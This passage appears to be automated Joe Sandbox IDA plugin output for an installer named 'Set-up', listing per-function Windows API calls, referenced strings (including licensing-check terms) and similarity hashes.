                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020,00000000,00000000), ref: 00F132BB
                                                                                                                                    • Part of subcall function 00F13480: EnterCriticalSection.KERNEL32(0131BE48), ref: 00F134B6
                                                                                                                                    • Part of subcall function 00F13480: GetCurrentThreadId.KERNEL32 ref: 00F134C7
                                                                                                                                    • Part of subcall function 00F13480: new.LIBCMT ref: 00F134E1
                                                                                                                                    • Part of subcall function 00F13480: LeaveCriticalSection.KERNEL32(0131BE48), ref: 00F13530
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000020), ref: 00F132E1
                                                                                                                                  Strings
                                                                                                                                  • QueryPerformanceCounter(), xrefs: 00F13192
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$Enter$CounterCurrentErrorExceptionException@8LastPerformanceQueryRaiseThreadThrow
                                                                                                                                  • String ID: QueryPerformanceCounter()
                                                                                                                                  • API String ID: 1964512917-1461196644
                                                                                                                                  • Opcode ID: a1c8cb7971ac30f5ab9a065c7411b90e6cc5f204ece3b3043ebd51e4f1efecf6
                                                                                                                                  • Instruction ID: e46d6b2fba448b4ca6048d267de7cd01983b00ff9b4123a50546cc7842c12c7d
                                                                                                                                  • Opcode Fuzzy Hash: a1c8cb7971ac30f5ab9a065c7411b90e6cc5f204ece3b3043ebd51e4f1efecf6
                                                                                                                                  • Instruction Fuzzy Hash: 7F51D872E002059BCB28DF59D885A9EB7FDFB89720F1042AEE815D7344DB349945DB90
                                                                                                                                  APIs
                                                                                                                                  • GetAclInformation.ADVAPI32(460C02D8,?,0000000C,00000002,?,?), ref: 00E5A63F
                                                                                                                                  • LocalAlloc.KERNEL32(00000000,?,?,?), ref: 00E5A673
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,?,?), ref: 00E5A681
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A711
                                                                                                                                    • Part of subcall function 00E5A4D0: LocalAlloc.KERNEL32(00000000,00000008), ref: 00E5A4F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocLocal$ErrorException@8InformationLastThrow
                                                                                                                                  • String ID: GetAclInformation()$LocalAlloc()
                                                                                                                                  • API String ID: 1246304920-2239764287
                                                                                                                                  • Opcode ID: 53dc2ad9729c610a9be5732baaa365250d3afffff746aa5cb2d5ba82df9242e0
                                                                                                                                  • Instruction ID: 5910ccebbf997bbce589ec4ea4129fcc90da9e951e88b45634eca174dd27add1
                                                                                                                                  • Opcode Fuzzy Hash: 53dc2ad9729c610a9be5732baaa365250d3afffff746aa5cb2d5ba82df9242e0
                                                                                                                                  • Instruction Fuzzy Hash: EB312771700209ABDB28AFB5DC85E7EB7B9EF54345F14093DF902E72C0DA7098489762
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,460C02D8), ref: 00E52681
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5268F
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E52779
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E526BE
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000001,?,?), ref: 00E52743
                                                                                                                                  Strings
                                                                                                                                  • TryGetEnvironmentVariableT: GetEnvironmentVariable(2), xrefs: 00E52896
                                                                                                                                  • TryGetEnvironmentVariableT: GetEnvironmentVariable(1), xrefs: 00E5286A
                                                                                                                                  • GetEnvironmentVariableT: GetEnvironmentVariable, xrefs: 00E5293C
                                                                                                                                  • GetCurrentDirectory(), xrefs: 00E5269D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory$Concurrency::cancel_current_taskErrorExceptionException@8LastRaiseThrow
                                                                                                                                  • String ID: GetCurrentDirectory()$GetEnvironmentVariableT: GetEnvironmentVariable$TryGetEnvironmentVariableT: GetEnvironmentVariable(1)$TryGetEnvironmentVariableT: GetEnvironmentVariable(2)
                                                                                                                                  • API String ID: 3139870734-3647665761
                                                                                                                                  • Opcode ID: 59c93f3d1d0ab4a08a8ee76a561a98ee32d6b9b76d4ddc6711ef2269d2b84e5d
                                                                                                                                  • Instruction ID: da8fc0d973626614919f6d458fb2cef4ec1b4ea879f02d9395410a6124921b62
                                                                                                                                  • Opcode Fuzzy Hash: 59c93f3d1d0ab4a08a8ee76a561a98ee32d6b9b76d4ddc6711ef2269d2b84e5d
                                                                                                                                  • Instruction Fuzzy Hash: D73106716002059BCB24EF64DC05B6FB7F8EF88714F00492EE925A7280DFB5A848CB95
                                                                                                                                  APIs
                                                                                                                                  • WriteConsoleW.KERNEL32(?,?,00004000,?,00000000,460C02D8), ref: 00E47D65
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E47D88
                                                                                                                                  • WriteFile.KERNEL32(?,?,00010000,?,00000000,460C02D8), ref: 00E48005
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E48024
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite$BreakConcurrency::cancel_current_taskConsoleDebugDebuggerModuleNamePresent
                                                                                                                                  • String ID: !af_ && i<s_$WriteConsoleW()$WriteFile()$datavect<unsigned char>::operator []
                                                                                                                                  • API String ID: 4012916999-2701911002
                                                                                                                                  • Opcode ID: 8590c97ec87e1620d28c5621052975abd2f938598af57555f038310eb67acaef
                                                                                                                                  • Instruction ID: be78ab8b28e9bf24a8027973e869da0b2b7de5cd1557495be6bb7528ddb1347f
                                                                                                                                  • Opcode Fuzzy Hash: 8590c97ec87e1620d28c5621052975abd2f938598af57555f038310eb67acaef
                                                                                                                                  • Instruction Fuzzy Hash: 34C1A271A042498FCB24CFA8D480BAEBBF1FF58314F14466DE495A7381D771A949CB90
                                                                                                                                  APIs
                                                                                                                                  • GetFileType.KERNEL32(?,?,?,?), ref: 00E6BAF1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00E6BAFD
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6BB5C
                                                                                                                                  • CopyFileW.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,460C02D8,00000401,?,00000000), ref: 00E6BC6D
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00E6BCF2
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6BD36
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8FileLastThrow$CopyType
                                                                                                                                  • String ID: CopyFileW()$GetFileType()
                                                                                                                                  • API String ID: 1577141544-1015916104
                                                                                                                                  • Opcode ID: 9fbd90caa35636bfd653b1b8534e91e3db1d6c8dd500168b530f7cbc4d2957ab
                                                                                                                                  • Instruction ID: 5150cb9a96b436c6f8cee05bc52c3252dd79bf968ba40fa555e01f961d8f50d4
                                                                                                                                  • Opcode Fuzzy Hash: 9fbd90caa35636bfd653b1b8534e91e3db1d6c8dd500168b530f7cbc4d2957ab
                                                                                                                                  • Instruction Fuzzy Hash: 57819C70A01249EFDB18DFA4D958BAEBBF8BF44314F144169E411E7380DB75AA08CBA1
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E70145
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentProcessId.KERNEL32(00000000,?,, PID ,00000006,9.39,00000004,', version ,?,00000000,Ensure check failed in module ',0000001F,-000000C7), ref: 00E447C5
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentThreadId.KERNEL32 ref: 00E44809
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$BreakConcurrency::cancel_current_taskDebugDebuggerFileModuleNamePresentProcessThread
                                                                                                                                  • String ID: !af_$!af_ && i<s_$datavect<class basic_ncstring<wchar_t> *>::operator []$datavect<struct WWLib::RegItem *>::operator []$datavect<struct WWLib::RegItem *>::size$ncvector<class basic_ncstring<wchar_t> >::operator []$ncvector<struct WWLib::RegItem>::push_back
                                                                                                                                  • API String ID: 4028080653-3118977989
                                                                                                                                  • Opcode ID: 2e485b77abb2848ddb2ce493af31a10ef0dcf427c86f2a8a4d4bea5d6cb95761
                                                                                                                                  • Instruction ID: 35cebb10254393b7c66db5677e0018404d654437ef9d47293709f3d1cd36186f
                                                                                                                                  • Opcode Fuzzy Hash: 2e485b77abb2848ddb2ce493af31a10ef0dcf427c86f2a8a4d4bea5d6cb95761
                                                                                                                                  • Instruction Fuzzy Hash: E0612071600749EFDB24CF59D845F6AB7E4FB10728F00C62DE8696B692C7B5AD04CB90
                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,?,?), ref: 00E6ED87
                                                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 00E6EEAF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue
                                                                                                                                  • String ID: !af_$NumCast$RegQueryKeyEx()$RegQueryValueExW()$datavect<unsigned char>::begin$value >= 0
                                                                                                                                  • API String ID: 3660427363-1042171720
                                                                                                                                  • Opcode ID: 12407abbbf8e31a4603a4617c739a014842c2411f902a3e21d5a2dd1cb948aae
                                                                                                                                  • Instruction ID: 9901f68c4504c40119c5d94a63b29aa0c9686a722813e94ce317e37b71efbda2
                                                                                                                                  • Opcode Fuzzy Hash: 12407abbbf8e31a4603a4617c739a014842c2411f902a3e21d5a2dd1cb948aae
                                                                                                                                  • Instruction Fuzzy Hash: 03618874A00209EBDF18DF60D895BAEBBB5FB48358F104129E921B72C0D775A959CFA0
                                                                                                                                  APIs
                                                                                                                                  • SrcHashImpl::SrcHashImpl.MSPDB140-MSVCRT ref: 0106F00E
                                                                                                                                  • SrcHashImpl::SrcHashImpl.MSPDB140-MSVCRT ref: 0106F0F6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Hash$ImplImpl::
                                                                                                                                  • String ID: 8$Cleverbridge$Clvrbrg$MSM$Pirated$Unlicensed
                                                                                                                                  • API String ID: 1932635256-2468723722
                                                                                                                                  • Opcode ID: 9ac9669328eb99cf1f01101d28897875e6b16de89e4abadfe102e3735cd0e22a
                                                                                                                                  • Instruction ID: 79a0e13b503266035669d5d81cb5dc9d559d1340881d20a40d7974d77b850c41
                                                                                                                                  • Opcode Fuzzy Hash: 9ac9669328eb99cf1f01101d28897875e6b16de89e4abadfe102e3735cd0e22a
                                                                                                                                  • Instruction Fuzzy Hash: 8B610171C0020AEEDF15EFA4E861BEEBBF8BF11304F108559E16177191DB706A09CBA1
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8), ref: 00E63D29
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E63E98
                                                                                                                                    • Part of subcall function 00E5EF00: EnterCriticalSection.KERNEL32(0131B8F8), ref: 00E5EF39
                                                                                                                                    • Part of subcall function 00E5EF00: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5EF95
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,01307E00,00000001,?,00000001,?,00000000), ref: 00E63D81
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,01307DF8,00000001,?,00000001,0000003F,00000000), ref: 00E63DBC
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,01307DFC,00000001,?,00000001,0000003F,00000000), ref: 00E63DF8
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,01307DF0,00000001,?,00000001,0000003F,00000000), ref: 00E63E2F
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000400,01307DF4,00000001,?,00000001,0000003F,00000000), ref: 00E63E6B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$CriticalSection$EnterLeave
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 145704051-1684325040
                                                                                                                                  • Opcode ID: 9e0080bc1adbff3986406274e93409ff2a06224255caccc4ea8abd53fcf1342c
                                                                                                                                  • Instruction ID: 2f267f9418d876aade17e514caf45b4a610f20432c8701980f117e24831a13fc
                                                                                                                                  • Opcode Fuzzy Hash: 9e0080bc1adbff3986406274e93409ff2a06224255caccc4ea8abd53fcf1342c
                                                                                                                                  • Instruction Fuzzy Hash: 1951DD30E84288BEEB22CBA49859BFDBBBCEB01758F400095F594B62C5C3B16B45C761
                                                                                                                                  APIs
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,?,00000105,?,460C02D8), ref: 00E524FE
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,?,-00000002,?,?,?,460C02D8), ref: 00E52546
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,460C02D8), ref: 00E52552
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E52581
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E525CA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryException@8ThrowWindows$ErrorLast
                                                                                                                                  • String ID: !af_$GetWindowsDirectory()$datavect<wchar_t>::size
                                                                                                                                  • API String ID: 3600687767-570471865
                                                                                                                                  • Opcode ID: e1971f4f327dc1c2de03416313f8cbaccb7d2334f936410a3e83d4d14a9d53d8
                                                                                                                                  • Instruction ID: 3857f6587de53a3e641fca80d023302ef35840ed6fd4f86a5a1a6172278cf3ad
                                                                                                                                  • Opcode Fuzzy Hash: e1971f4f327dc1c2de03416313f8cbaccb7d2334f936410a3e83d4d14a9d53d8
                                                                                                                                  • Instruction Fuzzy Hash: 0D411771A00209EBDB24DBA5CC55FAEBBB8EF15705F00145DE90177280EBB5A908CBA1
                                                                                                                                  APIs
                                                                                                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00E520B2
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00000000,00000000,460C02D8,00000000), ref: 00E520C0
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E520EE
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00E52188
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongNamePath$ErrorExceptionException@8LastRaiseThrow
                                                                                                                                  • String ID: GetFullPathName()$GetLongPathName()
                                                                                                                                  • API String ID: 2820348651-3730717445
                                                                                                                                  • Opcode ID: 2ff7ac444e12f53c6ae1aa627e5b5130a40d2e3ecce7cdc3886f20918e2add44
                                                                                                                                  • Instruction ID: 7cafd562220c9eebb3a9b786f2982c3e40a100a37ab46282f66567f52d46c0bc
                                                                                                                                  • Opcode Fuzzy Hash: 2ff7ac444e12f53c6ae1aa627e5b5130a40d2e3ecce7cdc3886f20918e2add44
                                                                                                                                  • Instruction Fuzzy Hash: 10411771600605ABCB24EB65CD45B6FBBFDEF84715F10492DFA15E32C0DBB1A8488791
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00E4A99F,0000012B,?,00000000,?,00E4A99F,00000000), ref: 00E4AA06
                                                                                                                                  • OutputDebugStringA.KERNEL32(00E4AACB,?,?,?,?,00000000,?,00E4A99F,00000000), ref: 00E4AA43
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00000000,?,00E4A99F,00000000), ref: 00E4AA4B
                                                                                                                                  • CreateFileA.KERNEL32(CONOUT$,40000000,00000007,00000000,00000003,00000000,00000000,?,?,?,?,00000000,?,00E4A99F,00000000), ref: 00E4AA72
                                                                                                                                  • WriteFile.KERNEL32(00000000,00E4AACB,00E4AACC,00E4A99F,00000000,?,?,?,?,00000000,?,00E4A99F,00000000), ref: 00E4AAA2
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,00E4A99F,00000000), ref: 00E4AAB2
                                                                                                                                  • MessageBoxA.USER32(00000000,00E4AACB,00000000), ref: 00E4AAF4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Handle$CloseCreateDebugMessageModuleNameOutputStringWrite
                                                                                                                                  • String ID: CONOUT$
                                                                                                                                  • API String ID: 2479023045-3130406586
                                                                                                                                  • Opcode ID: 0ea9406d79d2125643ab6c692e3fc92cbadd5ddfbf72b3cb28958e201df53699
                                                                                                                                  • Instruction ID: e6f42c317c4fe50823c92b70774f6f2abac3fa4cee8706bf4befbbc4467293bb
                                                                                                                                  • Opcode Fuzzy Hash: 0ea9406d79d2125643ab6c692e3fc92cbadd5ddfbf72b3cb28958e201df53699
                                                                                                                                  • Instruction Fuzzy Hash: F5312C317402146BDB389B34AC85FAE7B68DB95724F044279F916BB2C5CBB06C45C7A2
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(?,?,?), ref: 00E65C61
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E65C6B
                                                                                                                                  • ResetEvent.KERNEL32(?,?,?), ref: 00E65C8B
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E65C95
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65CEE
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E65D1B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorEventException@8LastThrow$Reset
                                                                                                                                  • String ID: ResetEvent()$SetEvent()
                                                                                                                                  • API String ID: 840212611-3981826667
                                                                                                                                  • Opcode ID: b30eaa02794d37137588b05c517c383f61b766dcb5d97e16db994851938f3d4a
                                                                                                                                  • Instruction ID: 58781d94fbb5b9a4b5834a6fcb5e425fef5e4ead5c6138a925c55d9ad805b914
                                                                                                                                  • Opcode Fuzzy Hash: b30eaa02794d37137588b05c517c383f61b766dcb5d97e16db994851938f3d4a
                                                                                                                                  • Instruction Fuzzy Hash: B421C731354702AFD618EB34ED49F69BBE4BF54B54F100669B821A32D4DB70B844C796
                                                                                                                                  APIs
                                                                                                                                  • WaitForSingleObjectEx.KERNEL32(?,00000401,00000000,?,?), ref: 00E6B11A
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E6B128
                                                                                                                                  • WaitForMultipleObjectsEx.KERNEL32(?,?,00000000,00000401,00000000,?,?), ref: 00E6B155
                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 00E6B163
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B1B8
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B1E5
                                                                                                                                  Strings
                                                                                                                                  • WaitForSingleObjectEx(), xrefs: 00E6B196
                                                                                                                                  • WaitForMultipleObjectsEx(), xrefs: 00E6B1BF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8LastThrowWait$MultipleObjectObjectsSingle
                                                                                                                                  • String ID: WaitForMultipleObjectsEx()$WaitForSingleObjectEx()
                                                                                                                                  • API String ID: 391083669-782584538
                                                                                                                                  • Opcode ID: adbc8b5b2db8105f1acfbd0d83c9c9413597668103a2ee8a85ba59a091594394
                                                                                                                                  • Instruction ID: be13d1ce9accc3c9d31c8bb2ad15f870134ff5f1acc583c1a8a700e610b5c174
                                                                                                                                  • Opcode Fuzzy Hash: adbc8b5b2db8105f1acfbd0d83c9c9413597668103a2ee8a85ba59a091594394
                                                                                                                                  • Instruction Fuzzy Hash: A421D470604606BFC714EF24EC55A99BBE4BF49724F100629F435E32D4DB70B954CB95
                                                                                                                                  APIs
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,?, $,460C02D8,?), ref: 00E51B12
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E51B49
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E51B78
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E51BD8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw$ErrorLastMultipleObjectsWait
                                                                                                                                  • String ID: $$ $$WaitForMultipleObjects()$WaitForMultipleObjects() returned unexpected result 0x
                                                                                                                                  • API String ID: 1864632994-3414943859
                                                                                                                                  • Opcode ID: 1a2e591c91c95772872f33d6089862eadf5d788da929867d0aa338f88a37dc30
                                                                                                                                  • Instruction ID: bae7fdab55e29ac557b6383fa42e33c283308273345e670d3fa4e31c84906ea9
                                                                                                                                  • Opcode Fuzzy Hash: 1a2e591c91c95772872f33d6089862eadf5d788da929867d0aa338f88a37dc30
                                                                                                                                  • Instruction Fuzzy Hash: 58210531940208AADF24EBA4DC4AFDD7BB9EB01710F1049A9F914B72C1DBB565488796
                                                                                                                                  APIs
                                                                                                                                  • FindCompleteObject.LIBCMT ref: 0111BAF8
                                                                                                                                  • FindSITargetTypeInstance.LIBVCRUNTIME ref: 0111BB1C
                                                                                                                                  • FindMITargetTypeInstance.LIBVCRUNTIME ref: 0111BB31
                                                                                                                                    • Part of subcall function 0111B698: PMDtoOffset.LIBCMT ref: 0111B762
                                                                                                                                  • FindVITargetTypeInstance.LIBVCRUNTIME ref: 0111BB38
                                                                                                                                  • PMDtoOffset.LIBCMT ref: 0111BB49
                                                                                                                                  • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 0111BB73
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0111BB83
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$InstanceTargetType$Offset$CompleteException@8ObjectThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                  • String ID: Bad dynamic_cast!
                                                                                                                                  • API String ID: 528452320-2956939130
                                                                                                                                  • Opcode ID: 75aec7517bcdc86fb8192a752cb9b581736ce321c566488f88f9b687ac2a3204
                                                                                                                                  • Instruction ID: 82e0feacc74bb4433bd47b36fd676ada300c347e9ce6c6fe4a6f050c3c8f6072
                                                                                                                                  • Opcode Fuzzy Hash: 75aec7517bcdc86fb8192a752cb9b581736ce321c566488f88f9b687ac2a3204
                                                                                                                                  • Instruction Fuzzy Hash: D721C9729042099FCB1CDEA9DC41AAEFB78AF58615F140029F90197198DB75D900CBA9
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,0131A974,00000000,?,?,?,?), ref: 0106E8FC
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,0131A974,00000000,00000000,?,00000400), ref: 0106E9CF
                                                                                                                                  Strings
                                                                                                                                  • ncvector<struct ActCodeKeyInfo>::operator [], xrefs: 0106EBFB
                                                                                                                                  • !af_, xrefs: 0106EBD8, 0106EC00
                                                                                                                                  • datavect<struct ActCodeKeyInfo *>::operator [], xrefs: 0106EBE7
                                                                                                                                  • datavect<struct ActCodeKeyInfo *>::size, xrefs: 0106EBD3
                                                                                                                                  • !af_ && i<s_, xrefs: 0106EBEC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: OpenQueryValue
